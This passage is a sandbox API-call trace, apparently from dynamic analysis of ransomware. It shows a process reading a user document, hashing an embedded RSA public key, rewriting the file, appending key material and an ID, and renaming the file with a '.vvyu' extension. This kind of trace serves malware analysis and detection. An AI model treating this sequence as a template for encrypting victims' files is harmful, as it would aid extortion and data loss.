lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.370] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=22910) returned 1 [0196.370] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.373] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5958, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.373] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.375] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.375] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x597e, lpOverlapped=0x0) returned 1 [0196.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.376] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0196.377] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.377] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.377] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.378] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.378] GetLastError () returned 0x0 [0196.378] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.378] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0196.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.378] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.378] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.378] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5980) returned 0x2ea79b0 [0196.379] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1770 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea17b8 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.379] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e70 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2e58 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.383] GetCurrentThreadId () returned 0x66c [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5260 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.383] GetCurrentThreadId () returned 0x66c [0196.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e70 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ed0 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ee8 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e88 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e58 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea17b8 | out: hHeap=0x620000) returned 1 [0196.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.395] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x5979, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x5979, lpOverlapped=0x0) returned 1 [0196.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.396] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x597e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.396] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.398] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.398] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.398] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.399] CloseHandle (hObject=0x568) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.410] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Ni1u7VXc2C N4UUHwH.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ni1u7vxc2c n4uuhwh.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Ni1u7VXc2C N4UUHwH.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ni1u7vxc2c n4uuhwh.pps.vvyu")) returned 1 [0196.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.412] VirtualFree 